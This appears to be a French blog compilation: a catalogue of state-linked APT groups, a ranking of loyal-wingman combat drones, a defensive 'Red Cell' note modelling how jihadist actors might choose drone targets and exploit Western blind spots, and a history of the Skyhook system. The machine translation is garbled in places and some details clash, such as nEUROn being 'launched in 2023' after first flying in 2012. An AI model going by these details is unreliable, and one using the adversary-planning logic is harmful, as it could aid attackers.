• Cibles : Infrastructures critiques (énergie, télécoms), Ukraine.
• Méthodes : Cyberattaques destructrices (NotPetya, BlackEnergy).
• Exemple : Attaque contre le réseau électrique ukrainien (2015, 2016).

Gamaredon (Primitive Bear, Armageddon)

• Affiliation : FSB (sécurité intérieure russe).
• Cibles : Ukraine, dissidents russes, ONG.
• Méthodes : Malwares persistants (Pterodo), attaques par email.

2. Groupes liés à la Chine

APT41 (Winnti, Barium, Double Dragon)

• Affiliation : Ministère de la Sécurité d’État (MSS) + cybercriminels « patriotiques ».
• Cibles : Entreprises (jeux vidéo, santé, technologie), gouvernements asiatiques.
• Méthodes : Vol de propriété intellectuelle, ransomware (Winnti malware).
• Exemple : Attaques contre des studios de jeux (ex : Capcom, EA).

APT10 (MenuPass, Stone Panda, Cloud Hopper)

• Affiliation : MSS (Bureau 12 de Tianjin).
• Cibles : Gouvernements (Japon, Europe), prestataires IT (ex : HPE, IBM).
• Méthodes : Compromission de clouds, accès persistants.
• Exemple : Campagne Cloud Hopper (2016–2018).

APT31 (Zirconium, Judgment Panda)

• Affiliation : MSS.
• Cibles : Candidats politiques (ex : campagne de Biden en 2020), entreprises aérospatiales.
• Méthodes : Phishing ciblé, malwares (Badfly).

APT27 (Emissary Panda, Bronze Union)

• Affiliation : MSS.
• Cibles : Diplomates, organisations internationales (ex : ASEAN).
• Méthodes : Backdoors (ZxShell), attaques « watering hole ».

3. Groupes liés à l’Iran

APT33 (Elfin, Refined Kitten)

• Affiliation : Corps des Gardiens de la révolution islamique (IRGC).
• Cibles : Secteur énergétique (Arabie saoudite, États-Unis), dissidents iraniens.
• Méthodes : Malwares destructeurs (Shamoon), attaques par supply chain.

APT34 (OilRig, Helix Kitten)

• Affiliation : Ministère du renseignement iranien (MOIS).
• Cibles : Entreprises pétrolières, universités, gouvernements du Golfe.
• Méthodes : Outils personnalisés (PowRuner, BONDUPDATER).

APT35 (Charming Kitten, Phosphorus)

• Affiliation : IRGC.
• Cibles : Journalistes, militants, responsables politiques (ex : campagne de Trump en 2020).
• Méthodes : Ingénierie sociale, faux profils sur les réseaux sociaux.

4. Groupes liés à la Corée du Nord

APT38 (BlueNoroff, Stardust Chollima)

• Affiliation : Bureau 121 (renseignement nord-coréen).
• Cibles : Banques (ex : Bangladesh Bank, 2016), cryptomonnaies.
• Méthodes : Attaques SWIFT, malwares (FASTCash).

Lazarus Group

• Affiliation : Bureau 121 + cybercriminels.
• Cibles : Entreprises (Sony Pictures, 2014), infrastructures critiques.
• Méthodes : Ransomware (WannaCry), supply chain attacks.

5. Groupes liés à d’autres pays

APT32 (OceanLotus, SeaLotus) – Vietnam

• Affiliation : Gouvernement vietnamien.
• Cibles : Entreprises étrangères au Vietnam, médias, dissidents.
• Méthodes : Malwares (KerrDown), attaques ciblées.

APT-C-23 (Gaza Hackers) – Palestine/Hamas

• Affiliation : Groupes pro-palestiniens.
• Cibles : Israël, institutions juives.
• Méthodes : Phishing, malwares mobiles.

APT-C-35 (DoNot Team) – Inde/Pakistan

• Affiliation : Incertaine (liens avec l’Inde ou le Pakistan).
• Cibles : Gouvernements sud-asiatiques, militaires.
• Méthodes : Malwares Android (StealJob).

APT44 est un nom récent (2024) attribué par Mandiant (filiale de Google) au groupe Sandworm, un acteur cyber russe particulièrement actif et dangereux, lié au GRU (renseignement militaire russe). Ce groupe est responsable de certaines des cyberattaques les plus destructrices des dernières années, notamment en Ukraine et contre des infrastructures critiques en Europe et aux États-Unis

Résumé des alias d’APT44

6. Groupes « Mercenaires » (affiliation floue)

Dark Basin (Deceptikons)

• Affiliation : Société privée (ex : BellTroX en Inde).
• Cibles : Avocats, militants, entreprises (ex : ExxonMobil).
• Méthodes : Phishing, harcellement en ligne.

Bahamut

• Affiliation : Inconnue (liens avec le Moyen-Orient ou l’Asie du Sud).
• Cibles : Gouvernements, médias, ONG.
• Méthodes : Faux sites web, malwares (WindTail).

1. Russie : Les plus actifs en 2025–2026

APT44 (Sandworm, Seashell Blizzard, FROZENBARENTS)

• Statut : Le plus actif et dangereux en 2025–2026.
• Affiliation : GRU (renseignement militaire russe).
• Cibles récentes :
  • Infrastructures critiques en Ukraine et en Europe (énergie, transports).
  • Organisations soutenant l’Ukraine (ONG, gouvernements, entreprises logistiques).
  • Jeux Olympiques (campagnes de désinformation et sabotage).
• Méthodes :
  • Malwares destructeurs (CaddyWiper, PartyTicket).
  • Attaques coordonnées avec des opérations militaires (ex : coupures d’électricité en Ukraine, octobre 2022 et 2025).
  • Utilisation de false flags (fausses attributions à d’autres pays).
• Exemple récent :
  • Déploiement du ransomware Prestige contre des entreprises polonaises et françaises (2025).
  • Campagne contre les JO d’hiver 2026 (Milan-Cortina).

APT29 (Cozy Bear, SVR)

• Statut : Toujours très actif, surtout en espionnage politique.
• Cibles récentes :
  • Gouvernements européens et américains (vol de documents classifiés).
  • Laboratoires pharmaceutiques et biotech.
• Méthodes :
  • Phishing ultra-ciblé, malwares (WellMess, CosmicDuke).
  • Exploitation de vulnérabilités zero-day dans les logiciels collaboratifs (ex : Microsoft 365).

Gamaredon (Primitive Bear, FSB)

• Statut : Actif en Ukraine et contre les dissidents russes.
• Cibles récentes :
  • Administrations locales ukrainiennes.
  • Journalistes et militants anti-guerre.

2. Chine : Montée en puissance des groupes « polyvalents »

APT41 (Winnti, Double Dragon)

• Statut : Top 3 des groupes les plus actifs (cybercrime + espionnage).
• Cibles récentes :
  • Entreprises high-tech (Taïwan, Corée du Sud, Europe).
  • Secteur de la santé (vol de données sur les vaccins et médicaments).
• Méthodes :
  • Combinaison d’espionnage et de ransomware pour financer ses opérations.
  • Attaques via des sous-traitants IT (supply chain).

APT31 (Zirconium, MSS)

• Statut : En pleine expansion, ciblant les élections et les infrastructures.
• Cibles récentes :
  • Campagnes électorales (États-Unis, Taïwan, Inde).
  • Opérateurs télécoms en Asie du Sud-Est.
• Exemple récent :
  • Piratage de boîtes mail de responsables politiques américains (2025).

APT10 (MenuPass, MSS)

• Statut : Spécialisé dans l’espionnage économique à long terme.
• Cibles récentes :
  • Prestataires cloud (pour accéder à leurs clients gouvernementaux).
  • Universités et centres de recherche (vol de propriété intellectuelle).

3. Iran : Focus sur le Moyen-Orient et les dissidents

APT33 (Elfin, IRGC)

• Statut : Actif contre Israël, l’Arabie saoudite et les États-Unis.
• Cibles récentes :
  • Secteur énergétique (cyberattaques contre des raffineries).
  • Dissidents iraniens en Europe et aux États-Unis.
• Méthodes :
  • Malwares destructeurs (Shamoon v3).
  • Attaques par watering hole (sites web piégés).

APT34 (OilRig, MOIS)

• Statut : Cible les pays du Golfe et les entreprises pétrolières.
• Cibles récentes :
  • Sociétés pétrolières en Arabie saoudite et aux Émirats.
  • Ambassades israéliennes.

4. Corée du Nord : Cybercrime et financement du régime

Lazarus Group (APT38)

• Statut : Leader mondial du cybercrime étatique.
• Cibles récentes :
  • Banques et plateformes de cryptomonnaies (vols records en 2025).
  • Entreprises aérospatiales et de défense (vol de technologies).
• Méthodes :
  • Ransomware (Maui).
  • Attaques via des faux recrutements sur LinkedIn.

Kimsuky

• Statut : Spécialisé dans l’espionnage politique.
• Cibles récentes :
  • Experts en Corée du Sud et au Japon.
  • Think tanks travaillant sur la péninsule coréenne.

5. Nouveaux acteurs ou groupes en émergence (2024–2026)

APT-C-50 (Aliases : « Unfading Sea Haze », Chine)

• Statut : Nouveau groupe identifié en 2025, lié au MSS.
• Cibles :
  • Gouvernements d’Asie du Sud-Est (Philippines, Malaisie).
  • Infrastructures portuaires (espionnage et sabotage potentiel).

APT-C-63 (Aliases : « Tropic Trooper », Chine/Taïwan)

• Statut : Cible Taïwan et les entreprises travaillant avec le gouvernement taïwanais.
• Méthodes :
  • Attaques via des mises à jour logicielles compromises.

UNC4841 (Corée du Nord, lié à Lazarus)

• Statut : Groupe spécialisé dans les attaques contre les médias et les ONG.
• Cibles récentes :
  • Journalistes couvrant la Corée du Nord.
  • Organisations humanitaires.

6. Autres groupes notables

Turla (Snake, Russie, FSB/SVR)

• Statut : Moins médiatisé mais toujours actif en espionnage de haut niveau.
• Cibles récentes :
  • Ambassades et ministères des Affaires étrangères en Europe.

Bahamut (Origine incertaine, probablement Moyen-Orient/Asie du Sud)

• Statut : Groupe « mercenaire », louant ses services.
• Cibles récentes :
  • Entreprises et responsables politiques en Inde et au Pakistan.

Tableau récapitulatif des APT les plus actifs (2025–2026)

 Tendances clés en 2025–2026

1. Convergence espionnage/cybercrime :
   • Des groupes comme APT41 ou Lazarus mélangent vol de données et extorsion pour financer leurs opérations.
2. Attaques contre les infrastructures critiques :
   • APT44 et APT33 ciblent de plus en plus les secteurs énergie, eau et transports.
3. Utilisation de l’IA :
   • Génération automatique de phishing (deepfake vocal, emails ultra-personnalisés).
4. Ciblage des chaînes d’approvisionnement :
   • Compromission de prestataires IT pour atteindre leurs clients (ex : SolarWinds bis).
5. Guerre d’influence :
   • APT44 et APT31 mènent des campagnes de désinformation autour des élections et des JO.

Comment la DGSE et l’ANSSI les combattent ?

La France, via la DGSE (pour le renseignement) et l’ANSSI (pour la cybersécurité), surveille et contrarie ces groupes par :

• Détection précoce (outils comme Eole pour l’ANSSI).
• Collaboration internationale (avec la NSA, le GCHQ, etc.).
• Attribution publique (ex : accusation de la Chine pour APT31 en 2021).
• Renforcement des défenses (ex : certification des opérateurs d’importance vitale).

Les 10 drones militaires ailiers les plus avancés, conçus pour combattre aux côtés de pilotes humains.

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Les 10 drones militaires ailiers les plus avancés, conçus pour combattre aux côtés de pilotes humains.

Les drones de combat autonomes redessinent l’avenir de la puissance aérienne.

Kratos XQ-58A Valkyrie(L) et Bayraktar Kızılelma(R)1, 2

L’avènement des technologies militaires engendre rapidement des systèmes d’armes nouveaux et bien plus dangereux. Les programmes d’escadrille volante constituent un exemple de ces systèmes stratégiques : des drones de combat (UCAV) volent aux côtés d’aéronefs pilotés et coordonnent leurs actions pour atteindre plusieurs objectifs.

En résumé, les drones de combat (UCAV) sont des drones autonomes pilotés à bord d’un aéronef, capables de couvrir une plus grande superficie, de collecter davantage de données et de mener des frappes à distance de sécurité. De ce fait, ils réduisent les risques pour les pilotes dans les zones dangereuses, les véhicules sans pilote effectuant la majeure partie des opérations au sol.

Avec le temps, cette collaboration entre véhicules pilotés et drones devrait transformer les tactiques de combat aérien et rendre les forces aériennes plus flexibles et plus résistantes. Ceci étant dit, examinons quelques-uns des meilleurs programmes de systèmes d’appui aérien rapproché (ou « loyal wingman ») mis en œuvre à ce jour.

1. Kratos XQ-58A Valkyrie
2. 

Développé par KRatos Defense & Security Solutions en collaboration avec l’Air Force Research Laboratory (AFRL) depuis 2016, le Kratos XQ-58A Valkyrie est l’une des plateformes d’ailier fidèle les plus abouties des États-Unis. Depuis son premier vol en mars 2019, il est devenu une référence en matière d’intégration du combat autonome.

Le Valkyrie sert d’ailier aux F-22 Raptors et F-35 Lightning II autonomes pilotés. Il effectue des missions de surveillance, de reconnaissance, de guerre électronique et de frappe de précision. Doté d’une importante capacité d’emport, il peut accueillir des charges utiles létales et non létales grâce à une architecture de système de mission ouverte.

La plateforme fait preuve d’une autonomie avancée, capable d’opérations en essaim coordonnées et d’adapter ses tactiques en fonction des renseignements en temps réel sur le champ de bataille.

2. Boeing MQ-28 Ghost Bat
3. 

Le Boeing MQ-28 Ghost Bat s’est forgé une réputation de drone de combat aérien le plus avancé opérationnellement jamais conçu hors des États-Unis. Boeing Australie s’est associé à la Royal Australian Air Force pour développer ce drone.

Initialement connu sous le nom d’Airpower Teaming System, l’appareil a été officiellement rebaptisé Ghost Bat en 2022, en référence à la chasse coordonnée des chauves-souris australiennes.

Le Ghost Bat fonctionne comme un drone de combat furtif et polyvalent, capable de fonctionner de manière autonome ou d’accompagner les pilotes à leurs côtés.

Il est équipé de capteurs de suivi infrarouge, de systèmes de communication sécurisés et de soutes à charge utile modulables pouvant être configurées pour des armes, des outils de guerre électronique, du matériel de surveillance ou des leurres, selon la mission.

3. Sukhoi S-70 Okhotnik-B
4. 

Sukhoi et Mikoyan ont développé le Sukhoi S-70 Okhotnik-B russe, faisant suite à un projet de drone antérieur. Également connu sous le nom de Hunter-B, il est considéré comme l’un des plus grands drones d’escorte (ailier loyal) existants.

L’Okhotnik-B utilise une forme d’aile volante pour réduire sa détectabilité radar. Il est beaucoup plus grand que les drones similaires aux États-Unis et en Europe, ce qui laisse penser que la Russie entend l’utiliser principalement pour des frappes à longue portée plutôt que pour des opérations en essaim de petite envergure.

Son utilisation lors du conflit ukrainien a révélé à la fois ses atouts et ses faiblesses. Lors d’un incident survenu en 2024, le drone a perdu le contact avec le système de communication dans un espace aérien contesté et a dérivé de sa trajectoire, finissant par pénétrer en territoire contrôlé par l’Ukraine.

Un chasseur Su-57 qui se trouvait à proximité l’a ensuite abattu, révélant des problèmes au niveau des systèmes de communication sécurisée et de contrôle d’urgence que la Russie tente désormais de corriger dans les versions plus récentes.

4. Ailier Airbus
5. 

L’Airbus Wingman est le principal projet de drone autonome d’Europe et s’inscrit dans le cadre du programme FCAS (Future Combat Air System), qui réunit la France, l’Allemagne, l’Espagne et l’Italie. Le FCAS fonctionne comme un réseau d’avions de chasse pilotés, de drones, de satellites et de forces terrestres, soutenu par un système numérique partagé souvent appelé « cloud de combat ».

Au sein de cette structure, le Wingman représente la première génération d’aéronefs de soutien sans pilote. Son déploiement progressif est prévu, débutant à la fin des années 2020 par une meilleure connaissance du champ de bataille. Le Wingman travaillera plus étroitement avec les chasseurs pilotés d’ici 2030, pour ensuite participer à des opérations de combat coordonnées d’ici 2040.

5. Dassault nEUROn
6. 

Considéré comme le programme d’avion de combat le plus ancien d’Europe, le Dassault nEUROn a été lancé en 2023 grâce à un partenariat entre la France, la Grèce, l’Italie, l’Espagne, la Suède et la Suisse.

Ce programme, développé sur plus de vingt ans, a permis de tirer de précieux enseignements. Ces enseignements portent notamment sur l’intégration des différents systèmes et sur l’utilisation potentielle de ces aéronefs en opérations réelles.

Le nEUROn a effectué son premier vol en décembre 2012 et son premier test d’armement interne en 2015. Ces essais approfondis ont permis de démontrer sa conception furtive, ses systèmes de capteurs et ses rôles potentiels au combat.

6. Bayraktar Kızılelma
7. 

Le Bayraktar Kızılelma représente une avancée majeure pour l’industrie de défense turque et pour la technologie des drones de combat à l’échelle mondiale. Construit par Baykar, ce drone est le premier aéronef de combat sans pilote à réaction de Turquie. Il a effectué son premier vol en décembre 2022, en avance sur le calendrier prévu.

Le Kızılelma a déjà volé en formation avec des avions de chasse F-16C de l’armée de l’air turque, atteignant des altitudes supérieures à 9,5 kilomètres, démontrant ainsi sa capacité à travailler en douceur avec des aéronefs pilotés.

Grâce à son intelligence artificielle avancée, ce drone peut participer de manière autonome à des combats aériens à longue portée, les humains prenant les décisions finales quant à l’utilisation des armements. Sa configuration à ailes canard lui confère également une grande maniabilité, le rendant plus performant dans les missions air-air que la plupart des systèmes sans pilote précédents.

7. Guerrier HAL CATS
8. 

Le système CATS (Combat Air Teaming System) de Hindustan Aeronautics Limited (HAL), en Inde, est un important projet de défense national développé dans le cadre du programme « Make in India ». Ce fidèle allié du chasseur Warrior a franchi une étape clé début 2025 lorsque son démonstrateur à taille réelle a effectué un essai au sol de ses moteurs en janvier.

Le Warrior est conçu pour transporter dans ses soutes internes des armes telles que des systèmes anti-aérodromes intelligents et des missiles de combat rapproché de nouvelle génération, lui permettant de frapper des cibles jusqu’à 700 km à l’intérieur du territoire ennemi.

La conception furtive de l’appareil et ses capacités de décollage et d’atterrissage autonomes améliorent ses chances de survie dans des zones fortement défendues.

8. Hongdu GJ-11 Dragon Noir
9. 

L’entrée de la Chine dans le développement de drones de combat avancés s’est faite avec le Hongdu GJ-11, également connu sous les noms d’Épée acérée et de Dragon noir. Ce drone a été conçu par l’Institut de conception aéronautique de Shenyang et le groupe industriel aéronautique Hongdu, tous deux membres du vaste groupe AVIC.

Outre ses caractéristiques furtives, il peut opérer en coordination avec d’autres aéronefs. Le GJ-11 adopte une conception d’aile volante, avec des armements stockés en interne et sur des points d’emport externes. Les premières versions du drone étaient équipées de tuyères de moteur, mais le système d’échappement a ensuite été amélioré afin de réduire sa signature radar et thermique.

9. Projet NYX

Le projet NYX du Royaume-Uni est un programme de drones d’appui axé sur les hélicoptères plutôt que sur les avions de chasse. Annoncé en janvier 2026 par le ministère britannique de la Défense, ce projet réunit sept entreprises en compétition pour développer des drones autonomes capables d’opérer aux côtés des hélicoptères d’attaque AH-64E Apache de l’armée britannique.

Ces drones NYX devraient pouvoir transporter plus de 200 kg de charge utile, leur permettant d’utiliser des armes, des capteurs et des équipements de guerre électronique. Cependant, les équipages d’Apache conserveront la décision finale quant à l’emploi de la force, préservant ainsi un équilibre essentiel entre automatisation et contrôle humain.

10. Station de détection externe XQ-67A
11. 

Dans le cadre du programme américain d’aéronefs de combat collaboratifs (CCA), la station de détection hors-bord XQ-67A de General Atomics est l’un de ses drones clés. Conçue pour être abordable et facilement adaptable en production, elle privilégie le travail collaboratif à l’utilisation individuelle.

Le XQ-67A partage des éléments de conception avec le drone Avenger précédent, mais ajoute des systèmes autonomes modernes, des baies électroniques modulaires et une architecture ouverte qui permet d’installer rapidement différents équipements de mission.

Le XQ-67A peut être utilisé pour le renseignement, la guerre électronique, les missions de frappe et bien plus encore. Des versions futures sont également prévues pour des tâches telles que le ravitaillement en vol, le relais de communications et le leurre.

Conclusion

Les programmes de coopération aérienne montrent comment l’humanité progresse vers un avenir où elle fera équipe avec des pilotes humains et des aéronefs autonomes. Ces systèmes peuvent être déployés lors de missions à risque, accroître la portée et fournir une capacité de détection et de frappe supplémentaire sans mettre davantage de pilotes en danger.

Partout dans le monde, les pays investissent massivement dans cette technologie, preuve qu’elle devient un élément clé de la planification des futurs combats aériens. À mesure que ces drones s’améliorent et s’intègrent davantage, ils devraient transformer la manière dont les guerres aériennes sont menées et dont la puissance aérienne militaire est organisée.

Notes de Red Cell : Exploitation des capacités décentralisées des drones par des acteurs djihadistes utilisant la technologie

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Notes de Red Cell : Exploitation des capacités décentralisées des drones par des acteurs djihadistes utilisant la technologie

Un test de résistance stratégique des vulnérabilités occidentales

28 janvier 2026

Objectif de la note sur les globules rouges

Cette note de Red Cell examine comment un acteur djihadiste rationnel et décentralisé pourrait exploiter les capacités mises en avant par la série de publications « Guerre moderne ». L’objectif n’est pas de réaffirmer des conclusions analytiques, mais de mettre à l’épreuve les hypothèses occidentales, d’identifier les vulnérabilités exploitables et d’évaluer comment les adversaires sont susceptibles de penser, de s’adapter et d’agir lorsqu’ils opèrent sous des contraintes techniques, juridiques et opérationnelles.

Cette note vise à aider les décideurs, les planificateurs du renseignement, les spécialistes de la lutte contre le terrorisme et les acteurs de la protection des forces en mettant en lumière les angles morts, les réactions prévisibles et les compromis stratégiques plutôt que les détails d’exécution tactique.

Analyse des domaines cognitifs associés :

« Guerre moderne : décentralisation des capacités djihadistes et implications opérationnelles de la menace des drones. Évaluation, à partir de renseignements de première main, d’un produit de renforcement des capacités techniques ciblant les acteurs décentralisés et technologiquement avancés. »

L’évaluation analytique complète est disponible ici :

26 janvier

Cadrage des cellules rouges et logique de l’adversaire

L’adversaire évalué dans ce scénario de cellule rouge n’est ni un membre formellement intégré d’une province de l’État islamique, ni un opérateur dirigé de manière centralisée. L’acteur modélisé est idéologiquement aligné, techniquement compétent et opérationnellement autonome, intégré dans un environnement civil et contraint par des ressources limitées, un risque juridique et une faible conscience des risques.

Cet acteur est rationnel plutôt qu’impulsif. Ses décisions sont guidées par la faisabilité, la possibilité de nier toute responsabilité et l’effet recherché, plutôt que par la pureté idéologique ou la loyauté organisationnelle. L’adversaire ne vise pas la victoire sur le champ de bataille ni des opérations prolongées, mais des actions ciblées capables de générer un impact psychologique, une perturbation symbolique et un signal stratégique à moindre coût.

La cellule rouge part du principe que l’acteur accepte l’échec comme un résultat acceptable, à condition que les tentatives génèrent de la visibilité, forcent des réactions défensives ou imposent des charges de sécurité disproportionnées à l’adversaire.

Objectifs et critères de réussite de l’adversaire

Du point de vue de l’adversaire, le succès ne se mesure pas à la létalité ni au nombre de victimes. Les critères de succès sont délibérément larges et asymétriques.

Une opération réussie peut consister à provoquer des évacuations, à déclencher des confinements, à perturber des événements publics, à démontrer une capacité perçue de type militaire, ou à contraindre les autorités à déployer des contre-mesures visibles. L’amplification médiatique, l’anxiété publique et la réaction excessive des institutions sont considérées comme des gains stratégiques, même en l’absence de dommages matériels.

À l’inverse, la notion d’échec est définie de manière restrictive. L’identification prématurée, les perturbations lors de la préparation ou l’attribution avant l’exécution sont considérées comme des résultats inacceptables. Les dysfonctionnements techniques, les tentatives avortées ou l’attribution a posteriori sont des risques tolérés.

Ce cadre de référence modifie fondamentalement la façon dont le risque est calculé et explique pourquoi les systèmes à faible coût et à faible fiabilité restent attrayants dans une logique opérationnelle basée sur l’attrition.

Logique d’assemblage des capacités du point de vue de l’adversaire

L’adversaire interprète « La guerre moderne » non pas comme un guide d’armement, mais comme un cadre d’assemblage de capacités. L’accent est mis sur la modularité, l’accessibilité et l’autonomie.

Les capacités sont construites progressivement à l’aide de composants disponibles dans le commerce, de logiciels libres et d’outils de création civils. La complexité est réduite par une décomposition procédurale, permettant à l’acteur de progresser sans coordination externe ni expertise spécialisée.

La militarisation s’effectue par le biais d’accessoires et de configurations plutôt que par l’acquisition de la plateforme. Les systèmes de contrôle, la transmission vidéo, la personnalisation du micrologiciel et les interfaces de charge utile sont considérés comme des couches pouvant être ajoutées ou retirées en fonction de la tolérance au risque et des résultats des tests.

La logique sous-jacente est simple. Si un processus peut être expliqué étape par étape et testé par étapes distinctes, il peut être exécuté par une seule personne motivée.

Logique de conception opérationnelle

Logique de sélection des cibles

Le choix des cibles privilégie la valeur symbolique, l’accessibilité et l’ambiguïté des responsabilités. L’adversaire évite les sites fortement protégés affichant un dispositif anti-drones visible et privilégie les environnements où la fragmentation juridictionnelle, le partage des responsabilités entre secteurs public et privé ou l’incertitude juridique compliquent la rapidité de réaction.

Les cibles non stratégiques, porteuses d’une signification politique, diplomatique, culturelle ou sociétale, sont privilégiées par rapport aux objectifs purement tactiques. L’objectif est la perturbation plutôt que la destruction.

Moment et opportunité

Les opérations sont opportunistes plutôt que dictées par un calendrier. Les événements publics, les rassemblements importants et les périodes de forte surcharge informationnelle sont privilégiés, notamment lorsque l’attention portée à la sécurité est moindre.

Les facteurs environnementaux qui augmentent la confusion, tels qu’une mauvaise visibilité ou un bruit ambiant élevé, sont considérés comme des avantages plutôt que comme des obstacles.

Gestion des risques

Le risque est géré activement grâce à des points de décision réversibles. Les phases de test fonctionnent comme des points de contrôle informels. Si le risque d’exposition augmente, l’adversaire est prêt à abandonner ou à reporter l’activité sans être victime du biais des coûts irrécupérables.

L’évitement de l’attribution est privilégié par rapport à la persistance. L’acteur reconnaît que le projet pourrait ne jamais être exécuté.

Vulnérabilités occidentales exploitables

Le projet Red Cell identifie plusieurs vulnérabilités systémiques généralement considérées comme présentant un faible risque ou comme non menaçantes.

Les cadres de sécurité occidentaux s’appuient souvent excessivement sur des systèmes anti-drones centralisés et sophistiqués, tout en sous-estimant les menaces discrètes de type FPV qui exploitent la variabilité de la vitesse, de l’altitude et de l’approche. La responsabilité de la détection et de la réponse est fréquemment fragmentée entre les forces de l’ordre, l’armée, la sécurité privée et les gestionnaires de sites, créant ainsi des failles qu’un acteur autonome peut exploiter.

Une autre vulnérabilité réside dans la persistance à croire que l’activité des amateurs est intrinsèquement inoffensive. Cette hypothèse retarde la corrélation des comportements techniques qui, combinés, témoignent d’une progression des compétences.

Enfin, la lenteur des circuits de signalement et le manque de clarté des seuils d’escalade réduisent fréquemment l’efficacité du dépistage précoce, notamment pendant les phases de test où l’intervention est la plus réalisable.

Indicateurs que l’adversaire suppose invisibles

Du point de vue de l’adversaire, l’espace opérationnel le plus précieux est la zone grise de la normalité.

On suppose que les tests de sécurité se fondent dans une activité récréative légitime. Les achats progressifs sont souvent confondus avec le comportement ordinaire des consommateurs. Le dépannage technique est fréquemment négligé car il se déroule au sein de communautés en ligne grand public.

L’adversaire part du principe qu’aucun acteur ne pourra corréler ces signaux dans le temps, sur différentes plateformes et dans différents domaines. Cette hypothèse constitue une vulnérabilité critique que les défenseurs peuvent exploiter si une surveillance basée sur les modèles est mise en place.

Points de défaillance du point de vue de l’adversaire

Malgré ses avantages, ce modèle est fragile.

Le manque de fiabilité technique demeure une cause majeure de défaillance, notamment en ce qui concerne l’intégration de la charge utile et la stabilité du contrôle. Les erreurs humaines lors de la configuration et des tests nuisent fréquemment aux performances du système.

Le risque de détection est plus élevé lors des tests que lors de l’exécution, surtout lorsque des essais répétés sont nécessaires pour valider la fiabilité. Les contraintes environnementales et les observations humaines inattendues augmentent encore l’exposition.

Le groupe Red Cell estime que la plupart des adversaires opérant selon ce modèle connaîtront de multiples échecs avant d’espérer un succès, ce qui souligne l’importance de la détection précoce et de la perturbation pour maintenir un avantage stratégique et inspirer confiance dans les capacités de réponse.

Implications pour la communication stratégique

La communication stratégique est un élément central du calcul de l’adversaire. Une réaction excessive, des messages incohérents ou une attribution prématurée peuvent amplifier les incidents ; par conséquent, des réponses mesurées et proportionnées rassureront les décideurs et préviendront l’escalade.

Des mesures de sécurisation visibles peuvent rassurer les institutions, mais elles confortent simultanément l’adversaire dans son discours sur une efficacité asymétrique. À l’inverse, un manque de communication risque d’engendrer l’inquiétude du public et de propager des rumeurs.

Une communication stratégique efficace doit mettre l’accent sur la proportionnalité, la continuité des activités régulières et la confiance dans les cadres de sécurité existants, tout en évitant une discussion détaillée des méthodes ou des capacités de l’adversaire.

Ce qu’il ne faut pas faire

Du point de vue des globules rouges, plusieurs réponses défensives sont, comme prévu, contre-productives.

Ne présentez pas les incidents comme inédits ou transformateurs, car cela en amplifie la portée symbolique. N’appliquez pas systématiquement des contre-mesures évidentes, car cela renforce le sentiment de vulnérabilité. Ne confondez pas, dans le débat public, les activités de loisir avec des intentions hostiles, car cela nuit à la confiance et complique le recueil de renseignements.

Surtout, ne vous fiez pas aux récits d’attribution pour rétablir la confiance. La reconnaissance organisationnelle n’est pas un critère de réussite pour l’adversaire.

Compromis stratégiques

Les réponses défensives impliquent des compromis inévitables.

La visibilité peut dissuader, mais aussi signaler une vulnérabilité. La centralisation améliore le contrôle, mais réduit la résilience. Une prévention agressive diminue les risques, mais augmente les faux positifs et les complications juridiques. Une préparation distribuée favorise la détection précoce, mais exige une coordination et une formation continues.

Il est préférable de reconnaître et de gérer ces compromis plutôt que de nier leur existence.

Leçons stratégiques

Le principal risque n’est pas l’escalade technologique, mais la convergence de l’idéologie, de la technologie civile et de la logique opérationnelle décentralisée dans un contexte de fragmentation institutionnelle.

Ligne de base des globules rouges

La phase la plus dangereuse du cycle de la menace n’est pas l’exécution, mais la maturation des capacités en présence de civils. La prévention est plus réaliste que l’interdiction, à condition que les systèmes de détection passent d’indicateurs d’intention à des schémas basés sur les capacités. Des défaillances mineures peuvent néanmoins avoir des conséquences stratégiques si les réponses défensives sont mal gérées. Le principal atout de l’adversaire n’est pas la technologie, mais la prévisibilité des réactions des systèmes occidentaux.

Déclaration de confiance concernant les globules rouges

Cette évaluation de type « cellule rouge » est émise avec un niveau de confiance modéré. Le niveau de confiance est élevé concernant la logique de l’adversaire, ses motivations et l’exploitation des vulnérabilités systémiques. Il est plus faible concernant sa compétence technique et son taux de réussite opérationnelle. Cette évaluation vise à mettre en lumière les voies de risque et les facteurs de décision, plutôt qu’à prédire l’issue d’attaques spécifiques.

Skyhook : Système de récupération sol-air Fulton

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Skyhook : Système de récupération sol-air Fulton

• 1er février 2026

Le système de récupération sol-air Fulton, plus communément appelé Skyhook, utilise des aéronefs à voilure fixe se déplaçant à basse vitesse pour récupérer des charges au sol ( source ). Ces charges comprenaient des objets inanimés et des personnes ( source ). Toutefois, la récupération de personnel constituait la principale utilisation du système ( source ).

1.0. Qu’est-ce que le système de récupération sol-air Fulton ?

La Guerre froide a favorisé l’invention et la diffusion de systèmes hautement expérimentaux afin de prendre l’avantage sur l’adversaire. Nombre d’entre eux paraissent aujourd’hui absurdes et impraticables. Ils constituaient néanmoins une solution transitoire essentielle en attendant le développement de technologies plus avancées. Le système de récupération sol-air Fulton en est un exemple : il faut le voir pour le croire.

1.1. Comment ça marche ?

La cargaison (humaine ou autre) était accrochée à un système composé d’un câble et d’un ballon ( source ). Ce ballon, une fois gonflé, soulevait le câble dans les airs ( source ). Un avion spécialement modifié survolait la zone à basse vitesse constante et s’amarrait au câble suspendu ( source ). L’avion cabrait immédiatement après l’amarrage pour suspendre la charge ( source ). Les personnes utilisant cette méthode subissaient une force de 7 G lors de l’éjection à 200 km/h ( source ). Bien qu’inconfortable, cette méthode était relativement sûre ( source ). Enfin, l’équipage remontait la cargaison une fois celle-ci sécurisée ( source ). L’ensemble du processus durait environ six minutes ( source ).

1.2. Composants du système de récupération sol-air Fulton

Le système Skyhook se composait de deux ou trois parties, selon la charge à transporter. Un câble relié à un ballon était indispensable dans tous les cas ( source ). Les opérateurs gonflaient le ballon à l’aide de bouteilles d’hélium sous pression ( source ). Le câble était en nylon tressé et pouvait soulever 1 800 kg (4 000 lb) ( source ). La récupération du personnel nécessitait des harnais spécialement conçus ( source ).

Comme indiqué précédemment, la spécificité de ce système nécessitait des aéronefs spécialement modifiés. Parmi ces aéronefs figuraient le MC-130 Talon I (une variante du C-130), les B-17 et bien d’autres ( source ). En raison de leur faible vitesse de décrochage, les aéronefs à hélices étaient privilégiés. Le système d’ancrage, qui permet la capture de charges, est situé sur le nez de l’appareil ( source ). Il est constitué de deux tubes d’acier écartés à 70 degrés par rapport au nez ( source ).

